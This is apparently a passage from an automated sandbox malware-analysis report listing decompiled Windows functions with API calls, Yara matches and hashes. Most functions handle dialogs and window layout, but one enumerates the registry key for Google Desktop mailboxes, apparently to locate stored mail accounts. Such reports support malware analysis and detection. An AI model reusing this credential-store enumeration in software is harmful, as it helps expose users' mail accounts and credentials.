						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AE70(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040ADB3(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A27F(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AD9D(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x413560;
						E00401000(_t93,  &_v520, 0x412404);
						E00401000(_t93,  &_v265, 0x412440);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E00401540(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x413560
						_t54 = E0040143D(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AD38(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040AC8A(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A27F(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A27F(0, _t93, _t104, 0);
								E0040A437(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x412ff4;
								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x412ff4;
								_t54 = E0040143D( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E00408654(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}




















                                                                        0x0040b105
                                                                        0x0040b114
                                                                        0x0040b11a
                                                                        0x0040b11c
                                                                        0x0040b120
                                                                        0x0040b12d
                                                                        0x0040b136
                                                                        0x0040b13e
                                                                        0x0040b13e
                                                                        0x0040b144
                                                                        0x0040b149
                                                                        0x0040b14b
                                                                        0x0040b14b
                                                                        0x0040b150
                                                                        0x0040b155
                                                                        0x0040b157
                                                                        0x0040b157
                                                                        0x0040b15c
                                                                        0x0040b161
                                                                        0x0040b165
                                                                        0x0040b165
                                                                        0x0040b170
                                                                        0x0040b178
                                                                        0x0040b17e
                                                                        0x0040b17e
                                                                        0x0040b189
                                                                        0x0040b18d
                                                                        0x0040b18d
                                                                        0x0040b198
                                                                        0x0040b1a3
                                                                        0x0040b1ab
                                                                        0x0040b1bc
                                                                        0x0040b1c1
                                                                        0x0040b1c5
                                                                        0x0040b1cf
                                                                        0x0040b1d2
                                                                        0x0040b1d3
                                                                        0x0040b1e4
                                                                        0x0040b1ea
                                                                        0x0040b1ee
                                                                        0x0040b1f3
                                                                        0x0040b1f3
                                                                        0x0040b1f5
                                                                        0x0040b1f9
                                                                        0x0040b1fe
                                                                        0x0040b202
                                                                        0x0040b202
                                                                        0x0040b20c
                                                                        0x0040b23d
                                                                        0x0040b23d
                                                                        0x0040b242
                                                                        0x0040b268
                                                                        0x0040b268
                                                                        0x0040b26d
                                                                        0x0040b271
                                                                        0x0040b271
                                                                        0x0040b276
                                                                        0x0040b27b
                                                                        0x0040b27d
                                                                        0x0040b285
                                                                        0x0040b28b
                                                                        0x0040b29d
                                                                        0x0040b29e
                                                                        0x0040b2a3
                                                                        0x0040b2a3
                                                                        0x0040b2a3
                                                                        0x0040b2a5
                                                                        0x0040b2ab
                                                                        0x0040b2b0
                                                                        0x0040b2b0
                                                                        0x0040b2b5
                                                                        0x0040b2bb
                                                                        0x0040b2c3
                                                                        0x0040b2c7
                                                                        0x0040b2c9
                                                                        0x0040b2ce
                                                                        0x0040b2e1
                                                                        0x0040b2e1
                                                                        0x0040b2e7
                                                                        0x0040b2ed
                                                                        0x0040b2f3
                                                                        0x0040b2f3
                                                                        0x0040b2f8
                                                                        0x0040b2fe
                                                                        0x0040b306
                                                                        0x0040b30f
                                                                        0x0040b329
                                                                        0x0040b330
                                                                        0x0040b334
                                                                        0x0040b339
                                                                        0x0040b339
                                                                        0x0040b33d
                                                                        0x0040b343
                                                                        0x0040b34b
                                                                        0x0040b34b
                                                                        0x0040b350
                                                                        0x0040b356
                                                                        0x0040b364
                                                                        0x0040b364
                                                                        0x00000000
                                                                        0x0040b356
                                                                        0x0040b244
                                                                        0x0040b24a
                                                                        0x0040b250
                                                                        0x0040b263
                                                                        0x00000000
                                                                        0x0040b263
                                                                        0x0040b252
                                                                        0x0040b257
                                                                        0x00000000
                                                                        0x0040b20e
                                                                        0x0040b20e
                                                                        0x0040b21a
                                                                        0x0040b238
                                                                        0x00000000
                                                                        0x0040b238
                                                                        0x0040b21c
                                                                        0x0040b221
                                                                        0x0040b226
                                                                        0x0040b226
                                                                        0x0040b228
                                                                        0x00000000
                                                                        0x0040b228
                                                                        0x0040b369
                                                                        0x0040b369
                                                                        0x0040b36f
                                                                        0x0040b36f

                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 0040B13E
                                                                        • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DestroyFocusInvalidateRectWindow
                                                                        • String ID: `5A
                                                                        • API String ID: 3502187192-343712130
                                                                        • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                        • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                                        • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                        • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405CEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E0040173B(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
					E0040169B(_t58, _v8, 1, 1, 1, 0);
					E0040169B(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E004015AE(_t66, _a4, _a8, _a12);
			}










                                                                        0x00405cf1
                                                                        0x00405cf2
                                                                        0x00405cf9
                                                                        0x00405cfb
                                                                        0x00405cfe
                                                                        0x00405df3
                                                                        0x00405e0c
                                                                        0x00405e11
                                                                        0x00405e11
                                                                        0x00405df5
                                                                        0x00405df5
                                                                        0x00405df8
                                                                        0x00405dff
                                                                        0x00405dff
                                                                        0x00405d04
                                                                        0x00405d07
                                                                        0x00405d0f
                                                                        0x00405d1d
                                                                        0x00405d23
                                                                        0x00405d35
                                                                        0x00405d47
                                                                        0x00405d59
                                                                        0x00405d6b
                                                                        0x00405d7d
                                                                        0x00405d8f
                                                                        0x00405da1
                                                                        0x00405db3
                                                                        0x00405dc1
                                                                        0x00405dd0
                                                                        0x00405dd8
                                                                        0x00405de3
                                                                        0x00405de9
                                                                        0x00405dec
                                                                        0x00405e29

                                                                        APIs
                                                                        • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                          • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                          • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                          • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                        • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                        • String ID: $
                                                                        • API String ID: 2498372239-3993045852
                                                                        • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                        • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                                        • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                        • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040719C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040719C(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				char _v264;
				void* _v268;
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040EC05(_v268, 0,  &_v260);
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;
						}
						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E0040706C(_t29, _a4, _v264,  &_v260);
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040EC05(_v268, _t32,  &_v260);
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

















                                                                        0x0040719c
                                                                        0x004071b9
                                                                        0x004071be
                                                                        0x004071c3
                                                                        0x004071ca
                                                                        0x004071d2
                                                                        0x004071d7
                                                                        0x004071dc
                                                                        0x004071e9
                                                                        0x00407237
                                                                        0x00407237
                                                                        0x0040723c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407204
                                                                        0x00407209
                                                                        0x0040720e
                                                                        0x0040721c
                                                                        0x00407225
                                                                        0x00407225
                                                                        0x0040722c
                                                                        0x00407232
                                                                        0x00407232
                                                                        0x00407242
                                                                        0x00407242
                                                                        0x00407249

                                                                        APIs
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        • memset.MSVCRT ref: 004071D7
                                                                          • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                        Strings
                                                                        • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close$EnumOpenmemset
                                                                        • String ID: Software\Google\Google Desktop\Mailboxes
                                                                        • API String ID: 2255314230-2212045309
                                                                        • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                        • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                                        • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                        • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00401085(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x417388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}






                                                                        0x00401098
                                                                        0x004010a4
                                                                        0x004010bd
                                                                        0x004010c3
                                                                        0x004010cc
                                                                        0x00000000
                                                                        0x004010e0
                                                                        0x004010e4

                                                                        APIs
                                                                          • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                          • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                        • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                        • String ID: MS Sans Serif
                                                                        • API String ID: 4251605573-168460110
                                                                        • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                        • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                                        • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                        • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040DE43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040DE43(void** __eax, struct HWND__* _a4) {
				int _t6;
				void** _t10;

				_t10 = __eax;
				if( *0x417510 == 0) {
					memcpy(0x416e70,  *__eax, 0x50);
					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
					 *0x417510 = 1;
					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
					 *0x417510 =  *0x417510 & 0x00000000;
					 *0x416b9c = _t6;
					return 1;
				} else {
					return 1;
				}
			}





                                                                        0x0040de4b
                                                                        0x0040de4d
                                                                        0x0040de5d
                                                                        0x0040de6f
                                                                        0x0040de8d
                                                                        0x0040de93
                                                                        0x0040de99
                                                                        0x0040dea0
                                                                        0x0040dea8
                                                                        0x0040de4f
                                                                        0x0040de53
                                                                        0x0040de53

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpy$DialogParam
                                                                        • String ID: V7
                                                                        • API String ID: 392721444-2959985473
                                                                        • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                        • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                                        • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                        • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004062D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E004062D1(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				_push("edit");
				_push(_t10);
				L004115B2();
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                                                        0x004062ea
                                                                        0x004062f1
                                                                        0x00406304
                                                                        0x0040630a
                                                                        0x00406310
                                                                        0x00406315
                                                                        0x00406316
                                                                        0x0040631f
                                                                        0x00406324

                                                                        APIs
                                                                        • memset.MSVCRT ref: 004062F1
                                                                        • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                        • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ClassName_stricmpmemset
                                                                        • String ID: edit
                                                                        • API String ID: 3665161774-2167791130
                                                                        • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                        • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                        • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                        • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040EDAC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040EDAC() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x417520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x417520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41751c = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                        0x0040edb3
                                                                        0x0040edba
                                                                        0x0040edc2
                                                                        0x0040edc7
                                                                        0x0040edcf
                                                                        0x0040edd5
                                                                        0x00000000
                                                                        0x0040edd5
                                                                        0x0040edc7
                                                                        0x0040edda

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,73B74DE0,?,00000000), ref: 0040EDBA
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                        • API String ID: 2574300362-543337301
                                                                        • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                        • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                        • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                        • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040FE05, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E0040FE05(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x414288;
				_t27 = E00406549(0x46c, __esi);
				_push(0x20);
				L004115D0();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A2C(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L004115D0();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A2C(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}







                                                                        0x0040fe05
                                                                        0x0040fe0d
                                                                        0x0040fe13
                                                                        0x0040fe18
                                                                        0x0040fe1a
                                                                        0x0040fe25
                                                                        0x0040fe2e
                                                                        0x0040fe27
                                                                        0x0040fe27
                                                                        0x0040fe27
                                                                        0x0040fe30
                                                                        0x0040fe32
                                                                        0x0040fe38
                                                                        0x0040fe40
                                                                        0x0040fe49
                                                                        0x0040fe42
                                                                        0x0040fe42
                                                                        0x0040fe42
                                                                        0x0040fe4b
                                                                        0x0040fe4d
                                                                        0x0040fe53
                                                                        0x0040fe60
                                                                        0x0040fe72
                                                                        0x0040fe62
                                                                        0x0040fe62
                                                                        0x0040fe65
                                                                        0x0040fe67
                                                                        0x0040fe6a
                                                                        0x0040fe6d
                                                                        0x0040fe6d
                                                                        0x0040fe74
                                                                        0x0040fe76
                                                                        0x0040fe7c
                                                                        0x0040fe84
                                                                        0x0040fe96
                                                                        0x0040fe86
                                                                        0x0040fe86
                                                                        0x0040fe89
                                                                        0x0040fe8b
                                                                        0x0040fe8e
                                                                        0x0040fe91
                                                                        0x0040fe91
                                                                        0x0040fe98
                                                                        0x0040fe9a
                                                                        0x0040fea0
                                                                        0x0040fea8
                                                                        0x0040feba
                                                                        0x0040feaa
                                                                        0x0040feaa
                                                                        0x0040fead
                                                                        0x0040feaf
                                                                        0x0040feb2
                                                                        0x0040feb5
                                                                        0x0040feb5
                                                                        0x0040fec2
                                                                        0x0040fecd
                                                                        0x0040fed6
                                                                        0x0040fedd
                                                                        0x0040fee0
                                                                        0x0040fee3
                                                                        0x0040fee6
                                                                        0x0040feec

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$memset
                                                                        • String ID:
                                                                        • API String ID: 1860491036-0
                                                                        • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                        • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                        • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                        • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040BD0B, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040BD0B(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
